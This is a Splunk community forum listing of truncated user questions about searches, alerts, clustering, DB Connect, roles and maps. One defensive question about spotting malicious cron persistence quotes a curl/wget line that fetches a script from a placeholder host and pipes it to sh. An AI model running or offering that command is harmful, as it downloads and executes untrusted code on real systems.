All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

HI all, I have 2 index, that have same common field together.  I want to join both together. Query 1:      index=opennms "uei.opennms.org/nodes/nodeUp" OR "uei.opennms.org/nodes/nodeDown" | rex... See more...
HI all, I have 2 index, that have same common field together.  I want to join both together. Query 1:      index=opennms "uei.opennms.org/nodes/nodeUp" OR "uei.opennms.org/nodes/nodeDown" | rex field=eventuei "uei.opennms.org/nodes/node(?<Status>.+)" | stats max(_time) as Time latest(Status) as Status by nodelabel | table nodelabel, Status, Time     Query 2 :      index=itsm sourcetype=remedy_midtier | rename _time as Time | fieldformat Time=strftime(Time,"%Y-%m-%d %l:%M:%S %p") | table nodelabel, Incident_Number, Time     Output table 1:  nodelabel Status Time CASCO Up 2020-08-07 5:45:28 PM AERIB Up 2020-08-07 5:30:05 PM CNPYU Up 2020-08-07 5:34:41 PM Output Table 2:  nodelabel Incident_Number Time CASCO INC000013850038 2020-08-07 5:45:28 PM CNPTT INC000013850032 2020-08-07 5:34:42 PM CNPYU INC000013850032 2020-08-07 5:34:41 PM    expected output:  nodelabel Incident_Number Status Time CASCO INC000013850038 UP 2020-08-07 5:45:28 PM CNPTT INC000013850032   2020-08-07 5:34:42 PM CNPYU INC000013850032 UP 2020-08-07 5:34:41 PM   I used join inner command but it failed. please help me in the join function. here nodelabel should be the common factor.
This expression( 30/5 2-4 * * * ) I found to schedule alert from 2:30 Am to 4 AM which runs in every 5 minute https://crontab.guru/#30/5_2-4_*_*_* But this is not working in the Splunk cloud and ge... See more...
This expression( 30/5 2-4 * * * ) I found to schedule alert from 2:30 Am to 4 AM which runs in every 5 minute https://crontab.guru/#30/5_2-4_*_*_* But this is not working in the Splunk cloud and getting  below error Could someone please suggest the alternate expression which will work in splunk cloud
Hello to everyone, We had to change IP to our entire cluster, after the changes one SH member is not able to communicate the master. This member was the captain before the changes, i tried to conne... See more...
Hello to everyone, We had to change IP to our entire cluster, after the changes one SH member is not able to communicate the master. This member was the captain before the changes, i tried to connect it to the new SH cluster but without success The only error in the splunkd.log was  ERROR KVStorageProvider - An error occurred during the last operation ('saveBatchData:upsert', domain: '0', code: '0'): No collection available I execute the ./splunk clean kvstore and after that The main error in the logs now is: INFO AuthenticationManagerLDAP - Could not find user=admin The SH which is now the captain didn't have any issue and has the respectively configuration. Do you have any suggestion to solve this issue?
Hi Team, I have a search cluster of 12 nodes and I want to create alert if time gap  of "last_conf_replication"  is more than one hour.  Can you please advise?
Please provide me if you have any step by step process.
I've just been reviewing the Firewalls dashboard in the Continuous Monitoring section of the InfoSec app - the search that powers the External Source and Destination IP counts is this: | tstats summ... See more...
I've just been reviewing the Firewalls dashboard in the Continuous Monitoring section of the InfoSec app - the search that powers the External Source and Destination IP counts is this: | tstats summariesonly=true allow_old_summaries=true dc(All_Traffic.src_ip) from datamodel=Network_Traffic where All_Traffic.src_ip!=10.0.0.0/8 All_Traffic.src_ip!=192.168.0.0/16 All_Traffic.src_ip!=172.16.0.0/12 If change dc(All_Traffic.src_ip) to values(All_Traffic.src_ip), the list of IPs generated includes all our 10.0.0.0/8 addresses - I've seen this problem with other tstats network searches I've tried to run and thought I wasn't formatting the search properly but there's clearly an issue with the All_Traffic.src_ip!=10.0.0.0/8 filter Anyone else seen this/got a solution? Thanks
Hello, Splunk db connect had returned events with some SQL queries which needs to be send in the alert email for the users from splunk cloud. In the events the complete SQL query is coming , but whe... See more...
Hello, Splunk db connect had returned events with some SQL queries which needs to be send in the alert email for the users from splunk cloud. In the events the complete SQL query is coming , but when we receive them as alert the queries are getting truncated. Is there any way we can get the alerts with SQL queries without getting truncated. Is there any limit in number of  characters of each field send in alert email. Thank you
Hello, I have a search string like below, where it is fetching data from stage and giving out aggregates of Trades for each source system in that stage.  index=qrp STAGE IN (TRADE_EVENT) | bucket ... See more...
Hello, I have a search string like below, where it is fetching data from stage and giving out aggregates of Trades for each source system in that stage.  index=qrp STAGE IN (TRADE_EVENT) | bucket _time span=1h | timechart useother=f span=1h sum(TRADES) as "TradeCount" by ODS_SRC_SYSTEM_CODE | fillnull value=0 The results are fetched like below: TradeCount:A1   TradeCountA2   TradeCountA3 27                                 5                                 0 What should be my condition that will trigger the alert action, when sum(trades) for a source system is 0? Example: TradeCountA3 is having value Zero now. 
Hi, I am trying to build a table that counts different processes that occurred for a particular users in a 5 minute widow before the crash. I need that to analyze user behavior and reason behind the... See more...
Hi, I am trying to build a table that counts different processes that occurred for a particular users in a 5 minute widow before the crash. I need that to analyze user behavior and reason behind the crash. I am using UberAgent data for this. I have a search that shows events before the crash, the challenge is to combine different users with different 5 minute windows into one table. My raw data has time and event columns, I am looking for a way to introduce time filter per user: time event time filter 01:05 crash_event_user_1   01:04:59 event_user_1 include 01:04:58 event_user_1 include 01:04:42 event_user_1 include 01:04:31 event_user_1 include 01:02:30 event_user_1 include 01:01:25 event_user_1 include 12:59:25 event_user_1 exclude 12:58:25 event_user_1 exclude 01:03 crash_event_user_2   01:02:59 event_user_2 include 01:02:58 event_user_2 include 01:02:42 event_user_2 include 12:48:25 event_user_2 include 12:47:25 event_user_2 exclude 12:46:25 event_user_2 exclude Which commands you think can be useful in creating the searches? Is there a use e.g. for streamstats in narrowing the 5 minute window? Might using window parameter help  
Hello, I need a restrict role for only upload data file. I add this capability : edit_monitor - Required to make the "Add Data" option show up in the settings menu. indexes_edit - Required to mak... See more...
Hello, I need a restrict role for only upload data file. I add this capability : edit_monitor - Required to make the "Add Data" option show up in the settings menu. indexes_edit - Required to make the users index name show up in the Indexes drop down when uploading the file. edit_tcp - Required to get the file to actually upload. Without this capability the file upload would hang. search - Required so the user can preview the uploaded file.   But the settings are not visible then. The goal is to create a limited access account with only the rigth to upload data, nothing else. Is it possible ?     Thanks for your help.   SPlunk version 8.1
I am using Splunk dbConnect to  collect data from database. While configuring the connection, set the timezone as Etc/GMT+1 : -01:00 as the logs generation time in database is GMT+1 When I was searc... See more...
I am using Splunk dbConnect to  collect data from database. While configuring the connection, set the timezone as Etc/GMT+1 : -01:00 as the logs generation time in database is GMT+1 When I was searching the data and searched for time difference, got time difference of 1 hour, _time is 1 hr ahead of indextime.   FYI: The database is in GMT+1 What is the difference between Etc/GMT+1 : -01:00 and Etc/GMT-1 : +01:00 ?   Thank you for any help!
Hi all, I'm trying to display a week-over-week percentage change of event count collected for various countries, and display that percentage on the choropleth map. The time window is a rolling win... See more...
Hi all, I'm trying to display a week-over-week percentage change of event count collected for various countries, and display that percentage on the choropleth map. The time window is a rolling window of the past 7 days (including today) compared with the 7 days before that, so it's not always fixed to start on a Sunday. I also have to dedup `fieldA` and `fieldB` for each of the 7 days, i.e. if fieldA=5, fieldB=6 appears twice in each of the two 7-day period in the same country, I would do a `dedup` and the event would be counted once for both 7-day periods For example: Country LastWeek ThisWeek PercentChange US 10 10 0 Japan 5 4 -20 Australia 4 5 25 China 2 0 -100 Canada 0 2 400 For the Canada case, I'm dividing it by 1 instead of 0 to calculate PercentChange, because I still want to show that there is a change in the number of events. I would then display the Percentage change values on the map over the respective countries. The query I have is      index=test earliest=-6d@d latest=now() | bin _time span=7d | dedup _time fieldA fieldB country | stats count as ThisWeek by country | append [search index=test earliest=-13d@d latest=-6d@d | bin _time span=7d | dedup _time fieldA fieldB country | stats count as LastWeek by country ] | stats values(*) as * by country | eval LastWeek=if(isnotnull(LastWeek), LastWeek, 0) | eval ThisWeek=if(isnotnull(ThisWeek), ThisWeek, 0) | eval divideBy=if(LastWeek=0, 1, LastWeek) | eval PercentChange=round((ThisWeek - LastWeek)/divideBy * 100, 2) | stats values(PercentChange) as Percentage_Change by country | geom geo_countries featureIdField=country     I'm getting the map to display the values, however, my query takes a long time to parse and run. Can I optimize it to make it run faster? Thank you!
Axxxxxxxxx@gmail.
Hi   From the code below, I display a pie chart in order to display the top 10 of EventCode index="toto" sourcetype=tutu EventCode=* (Level=1 OR Level=2 OR Level=3) | fields _time host EventCode ... See more...
Hi   From the code below, I display a pie chart in order to display the top 10 of EventCode index="toto" sourcetype=tutu EventCode=* (Level=1 OR Level=2 OR Level=3) | fields _time host EventCode | eval time = strftime(_time, "%m/%d/%Y %H:%M") | stats count(host) as "Number of EventCode" by EventCode | sort -"Number of EventCode" | head 10  Now, I need to open a drilldown when I click on a slice of the pie chart I modified my xml like this but it doesnt works <init> <set token="EventCode">*</set> </init> <drilldown> <set token="EventCode">$click.value$</set> <link target="_blank">/app/titi/eee</link> </drilldown>  Could you help me please?
I have data in the following form: field A,    field B(this is an array) a              {"k":1}                 {"k":2}                 {"k":3} b              {"k":1}                 {"k":1}  ... See more...
I have data in the following form: field A,    field B(this is an array) a              {"k":1}                 {"k":2}                 {"k":3} b              {"k":1}                 {"k":1}                 {"k":1} field B is an array, I want to produce table like this field A, sumB a     6 b    3 what is the way to extract the values and add them up? my thinking was to do  | eval value=spath(fieldB, "k")  and I was expecting values to have array 1,2,3 and 1,1,1 but they did not
when some Trojans or virus  are implanted in the Linux OS. it will add cron job to  persist the Trojans . for example:         curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx... See more...
when some Trojans or virus  are implanted in the Linux OS. it will add cron job to  persist the Trojans . for example:         curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh         so, can I use splunk to monitor  newly added  cron job ?
Hi , I am trying to connect Azure Storage account with the Splunk Add-on for Microsoft Cloud Services following the below Url. https://docs.splunk.com/Documentation/AddOns/released/MSCloudServices/... See more...
Hi , I am trying to connect Azure Storage account with the Splunk Add-on for Microsoft Cloud Services following the below Url. https://docs.splunk.com/Documentation/AddOns/released/MSCloudServices/Configureazurestorageaccount How to check if it is connected successfully? Regards, Rahul
Hello, I'm trying to analyze an A/B test results on access pattern changes for a specific field. Simplified query looks like:   index=test-app (ab_test_id="baseline" OR ab_test_id="ab123") | time... See more...
Hello, I'm trying to analyze an A/B test results on access pattern changes for a specific field. Simplified query looks like:   index=test-app (ab_test_id="baseline" OR ab_test_id="ab123") | timechart count(eval(ab_test_id=="baseline")) as Baseline count(eval(ab_test_id=="abc123")) as Test by api_endpoint   Since the event counts diff by ~100x, it will be better to re-scale the data either like the following min-max normalization, or just a percentage of each API endpoint, e.g. api_xyz may account for 20% in baseline, but receives 50% in the A/B test (ab123). https://community.splunk.com/t5/Archive/Normalizing-feature-scaling-a-datapoint/td-p/194303 I used to have a concat field on the timechart, like   index=test-app (ab_test_id="baseline" OR ab_test_id="abc123") | eval endpoint_by_ab=mvzip(api_endpoint, ab_test_id, "_") | timechart count by endpoint_by_ab | addtotals row=true fieldname=_total_baseline *_baseline | addtotals row=true fieldname=_total_ab *_abc123 | foreach *_baseline [eval <<FIELD>> = round('<<FIELD>>' * 100 / _total_baseline)] | foreach *_abc123 [eval <<FIELD>> = round('<<FIELD>>' * 100 / _total_ab)]   It will be great to use the original api_endpoint to leverage the trellis layout to compare baseline with A/B for each api_endpoint, how should I do that? Thanks,
Hi.  I have a DB output job constantly failed with the following error:   ERROR org.easybatch.core.job.BatchJob - Unable to read next record java.lang.RuntimeException: javax.xml.stream.XMLStreamEx... See more...
Hi.  I have a DB output job constantly failed with the following error:   ERROR org.easybatch.core.job.BatchJob - Unable to read next record java.lang.RuntimeException: javax.xml.stream.XMLStreamException: ParseError at [row,col]:[123123,23423] Message: The reference to entity "g" must end with the ';' delimiter. ...    I have tested multiple times with the same data set, but it failed with ParseError in different positions with different messages.  My DB Connect is in version 3.1.4 installed in Splunk version 7.2.5.   Does anyone have any clues?    Thanks.
Hi all, I have below situation. Actual query is much longer so I just need the logic. cve is the multivalue field. It is seperated by comma. For every affected asset, there are more than one cves i... See more...
Hi all, I have below situation. Actual query is much longer so I just need the logic. cve is the multivalue field. It is seperated by comma. For every affected asset, there are more than one cves in each event and every asset is affected by same or more. I need to seperate them first using comma delim and then expand. My issue is that mvexpand has 500MB default limit. I have raised it to 10000MB. This is not ideal nor it is helping. I need an alternative to mvxpand. mvexpand also takes only one field to expand on. I have one more mvexpand in my query. So trying to look for an alternative option. Please advice. Thanks in advance. index=abc sourcetype="xyz" `comment limiting fields to only what I need` | fields dnsName, macAddress, state, description, vulnPubDate, firstSeen, lastSeen, hasBeenMitigated, port, seeAlso, xref, plugin_name, plugin_version, plugin_family, pluginInfo, pluginText, plugin_publication_date, plugin_modification_date, patch_publish_date, cvssV3Vector, plugin_id, cve, cvssV3BaseScore, ip, "repository.dataFormat" `comment cve is a multivalue field separated by comma so I need to them separated and expanded to get correct stats` | makemv delim="," cve | mvexpand cve `comment this is where my streaming commands go below which is long`